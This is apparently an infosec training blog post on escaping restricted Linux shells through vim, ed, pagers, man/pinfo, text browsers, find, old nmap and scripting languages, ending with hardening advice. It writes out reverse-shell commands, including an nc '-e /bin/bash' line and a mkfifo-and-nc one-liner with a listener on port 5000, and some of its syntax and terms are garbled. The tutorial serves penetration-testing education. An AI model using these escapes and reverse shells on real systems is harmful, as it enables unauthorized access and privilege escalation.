Restricted shells can be described as a well-known feature for Penetration Testers or Linux professionals. But mane security and IT experts can avoid it in general. These shells are a conceptual shell provided with restricted credentials that work under a particular environment. Allowing the users to use the minimum capacity to perform basic tasks.
These restrictions are useful for the Linux administrators. They often need to provide shell access to a specific user to perform management activities. So it’s necessary to restrict these shells to control any problem that may appear for the access to these shells.
The escape process related to these restrictions is just one part of a penetration test. This is designed to escalate the privileges that restrict the access to sensitive shells. These aspects can be used to gain upper hand shells and gain root access which is desirable. This depends mostly on the different files information that we can use to gain a broad knowledge of the environment. For example, user and service enumeration or some credentials can serve as lead to look for information into the system. It can also escalate the restrictions. The methodology used for this is based on three fundamental aspects-
- environment features
- users creativity
Common restricted shells:
There are many different shells available to choose some that are just necessary shells without severe restrictions like “rbash” (Restricted bash), maybe “rzsh” or “rksh” (Korn shell on restricted mode). These types of shells are straightforward and easy to bypass. Others types of shells are the ones who can redesign the whole administrator environment like “lshell” which are full configurable shells.
The characteristics that are included on configured shells are most of the times left to the users due to the accessibility aspect for work. However, some administrators create an unsecured path on the shells that lead to escalation privileges due to the lack of restrictions, that is the main reason and importance of the configurable shells.
Gathering Environment Information:
Once we got access to through the restrictive shells, the next step is to gain information about the environment and find information about which kind of restricted shell we are working on, by doing this we can know which techniques can be helpful to escalate privileges and gain sensitive information. Here some steps that can be used to gather information about the system:
- Check for commands with SUID credentials, especially the commands that are owned by “root” user that can be the critical point to escape the current shell and escalate stages.
- Also check the number of commands that you can run applying “sudo”. This way we can check if we can execute a program using a personal password.
- Check any command by hitting TAB key once or twice or typing the commands by hand.
- See if the languages are available like “python” or “ruby,” it may come handy on further examples
- Check for characters that can be used to escape like: “;” (colon), “$” (shell execution ta), “&” (background support).
- Check each one of the commands that may appear available if you don’t know their function looks for it; it may possess some hidden arguments that can be helpful.
- Finding out, which shell are you located may not be just as smooth as it seems, but you can dig through the error message that gives you hints to find out. Applying a command to issuing errors like on the examples below:
As we can see on the pictures, some shells provide their names on the system error messages some other might not, if you look into the shell manual and configuration and the types of errors that may be present on their configuration, this can be useful on the future to identify other types of shells.
Common initial techniques:
There are some helpful techniques that we can be used to escape restricted shells or be used to access one stage of the system, that’s it has restricted policies. Many of these techniques rely merely on Linux variable pollution use or command escape characters, here are some of these techniques:
The system provides default editors like vim, pico, nano or ed. Some of these editors can provide file browsing features. Vim provides one of the most notorious bypasses on shell restrictions due to its capacity to run command and script while using the tool, to check these aspects apply the following command if Vim is available:
type this inside vim interface :!/bin/ls – 1 .b*
On the picture below you can see that we manage to execute /bin/sh using Vim, now thanks to the features provided by Vim we can run commands on sh that was not available to zbash shell.
Another example of this method is ed which is an old console editor, often ed is provided to the user’s because it doesn’t represent high difficulties to use it, but it also possesses third party command execution features, quite similar to vim we can run scripts and command within ed to compromise our current shell. Once we are located within ed interface, we can escape the standard shell by executing the one shown below:
We managed to escape the respective shell and move to a different directory and take a look over files that the system did not allow before. Another editor is “ne” which is designed to be simple and efficient a replacement for “vim”. ne directory possess particular characteristics that allows the users to load configuration preferences. This can be used to read the files. Once we managed to open “ed” hit the “ESC” key, once you have accessed the main configuration menu go to the last menu showed on “prefs” window and enter to the option “load profile.” as it can be seen we can escalate almost any directory from there.
We can even access etc file from there and see each folder available to access:
– Pager commands:
Pagers on Linux are a utility that allows users to see the output of a specific command or text file that is too big for the screen to show. The two most known pagers are: “more” and “less,” these two also have escape features to execute scripts. If we open a file long enough and simple text: “ !’sh’ “ we can access a new shell and avoid the restricted shell. In the example below we use “more” to check its skip capabilities:
Now we have to do the same with “less” to see the difference:
pinfo and man commands:
The “man” command can be used to display manual pages for the commands, it also posses escape characteristics. Man uses more and less as default papers, but it works with others papers achieving the same results. On the other hand, pinfo is an information command that has skip features as well. When the ls command output appears to use the same method used for the pagers to access the new shell:
If we repeat the same process for pinfo, we can alter the status of a forbidden command like “ls”. We can achieve this using the following command
After the manual interface appears we can hit “ ! “ exclamation mark to access the command execution characteristic and we can execute some simple commands that weren’t allowed on the first shell. like “ cd /etc.” or “ ls /etc”
If we do that we can notice that we just bypassed the previous shell and we are now able to execute some commands that were blocked, now if we put this example on a real case scenario we can use “ nc” command to create a port listening on a victim machine. For this we need another PC connected within our network to serve as an example of the command:
We use pinfo again but in our victim pc to execute the command “ nc -victim ip address– -e /bin/bash. After hitting enter if the screen gets black is because probably we executed the command. This type of access is known as “reverse shell” as we set up before the victim machine is configured to listen on port 5000 and throw its /bin/bash to the attacker if we get to the attacker VM we can use the following command to listen on the address that we put before:
$nc -lvp 5000
We can now see that there’s a connection created to the victim’s location and we can explore through the files available with the user access.
The Swiss Army Tool:
As we could see we could find a sideway to get advantage on the restrictive shells, the use of “nc” command to gain access to the victim’s machine. It is known as network swiss army tool because is not common for administrators to disable its use on network environment so professionals can use it to establish a connection through ports.
One of the setbacks that we can draw from the use of “nc” command is that most of the security managers configure restrictions to use just as root users. Another aspect to mention is that “nc command” depends on the BSD version in use, so probably it will be no available use flags as -c or -e that makes almost impossible to inject a flag using “nc”
Although there are others ways to gain access using nc. is using deep knowledge of Linux system and type some commands like this on the victim machine to get a reverse shell:
$ rm -f /tmp/f; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc -l victim address> 5000 > /tmp/f”
Analyzing the commands:
If we analyze these commands, we can notice that there are separated by parts with “;”. The first part is placed to erase the “/tmp/if” file if there’s one, the second command creating the same file but as a FIFO file. This is a special type of file that means (first in, first out) it resembles a pipe because several processes can open it for reading or writing procedures and this file is going to serve as a data exchange for the “nc command “ and the interactive shell.
The third command does a variety of things first of all it opens the FIFO file that we created and pipes out the content to a shell with interactive capabilities on (/bin/sh -i). Also it can redirect any error to the standard output result (2> &1), at last the piping files are sent through the reverse shell configured on the port listening (5000) if we connect on our attacker PC it sure it will display the shell.
Note: This kind of command use is very tricky and hard to use but is presented as an alternative to executing a reverse shell without the regular access, it depends on several factors that can make the command files.
This type of methods is related to the Linux browser around is a well-known process, and it uses things such as “links”, “elinks” and “lynx” the use of browser are pretty decent option to escape restrictive shells as well.
Let’s take “links” for one example, if we open an specific website with a text box we can hit ESC key and it will display the menu, then you can get access through file and then click into Os shell and there you go an instant shell.
Another example of the use of browser to create a new shell is “lynx”, after opening lynx and used to load any website that contains a text box to scan like “google.com” for instance. by hitting the key “o” lynx will proceed to open the options available for the page where an alternative editor can be configured:
With linx we can use the text editor like vim within the browser just like we do it before on the pager. Both of the browser “links” and “lynx” can adapt this concept- we have to edit the box that applies to the editor location and use on the search box once we have configured it.
we can also get these results through console with the following command that imports the editor as an argument within the browser
$ lynx –editor=/usr/bin/vim www.google.com
mutt is a console email reader, it can be also used to create a new shell and skip restrictive shells, in order to create a new shell we just have to simply hit “ ! “ and this instruction will open a new command execution within mutt, then we try to open a new shell to see the results:
Find is a well-known command used to find files within Linux systems. It possess several characteristics, each of one that we need to mention today is “-exec” which allows us to execute a new shell, let’s used to skip a restrictive shell:
It can be seen that we could visualize /etc. directory and also some of their files, find is a very useful command, but the “-exec” mode can only execute commands that are allowed to be used by the users. This method can be useful on zbash or rksh shells, but a different shell with more restricted parameters wouldn’t be so valuable.
Nmap is one of the most popular scanners around the world. Security professionals use it in a restrictive shell although it is very rare to see that they allow nmap configuration. For example, nmap posses a feature called “–interactive” which provides a console where some commands can be executed.
Note: the nmap versions that allow doing this are the versions previous to 2009.
When you are scanning through old Linux distributions is common to find outdated versions of software there, so this is helpful to use and escalate the restrictions. nmap interactive mode can be used as is shown below:
$ nmap –interactive
As it can be seen the command that deploys the new shell resembles the one used for pagers and editors.
Programming languages are a great resource to execute different commands and different applications to avoid shells restrictions, show examples of methods that can be used with programming, may have no end, so we are going to analyze some of the most common methods of programming commands:
awk is designed for text processing is a special feature included in most of the UNIX operating system, for that reason is almost sure that we can execute this command on every Linux platform.
It posses several features like “print ()” and “ sprintf() “, the function that we are going to use to create a new shell is called “system ()” it allows us to execute /bin/sh in the system as it can be seen below:
Expect command is another example of language, but we can describe it as talk script that talks to other interactive programs, that means we can create a script and execute some interesting functions like “spawn ()” which allow us to drive an interactive shell using its control functions:
Python is a useful language to work on several aspects due to its flexibility and reliability. It possesses an extensive library and several applications here we can also use “system ()” within python and “pty ()” and some others to execute a new shell:
You can also apply the same procedure(Python) with ruby which is a versatile language as well. We can get through a new shell using irb (interactive ruby shell) from there we can call a new shell:
We can also send the shell through a listening port like we did with nc command using the command shown below:
On the attacker machine:
Perl can execute “ system () “ method to execute forbidden commands like we saw earlier and also you can use run using /bin/sh and “exec()” command to achieve this purpose.
We can also use perl to send shell from the victim to a listening port like in the example shown below:
On the attacker machine:
Php language possess several options like the ones we mentioned before with other languages, “system()” and “exec()” you can apply these features within or without php console. here is an example of this:
As we saw through the entire explanation of the methods, there are several ways to skip or bypass restrictive shells. For example, using application pre-installed on the system or manipulating new applications to access the forbidden files. The current advancement of new applications and tools makes almost impossible to protect. But some recommendations can make a shell a little more secure to these methods.
- It’s better to set your environment with “allowed commands” and not the other way around. The number of commands that you may know posses a skip feature. This is lower than the ones you don’t don’t know anything about
- Checking the allowed commands is always a good practice. This is to see if any command can interact with Linux variables to restrict those parameters
- if any command allowed posses skipping features, use restrict versions of the commands like
- While using a software that uses third-party options like a external editor. Restrict their access to be able only to read the content and not modify the variables content.
- Scripts those than can invoke other scripts are especially dangerous when running with different users credentials, so it’s better to avoid the use of these.
- Keep the allowed command list to the necessary minimum in order to protect your environment.
- If the use of pagers is necessary consider to avoid more or less and provide pagers that don’t possess skipping shell like most.
- Try to avoid the use programming languages and it’s that not possible considered to restrict the function like “system()”, “exec()” and “pty()”.
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
This is the second tier that includes limited access to our training materials and to our exclusive lab.
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!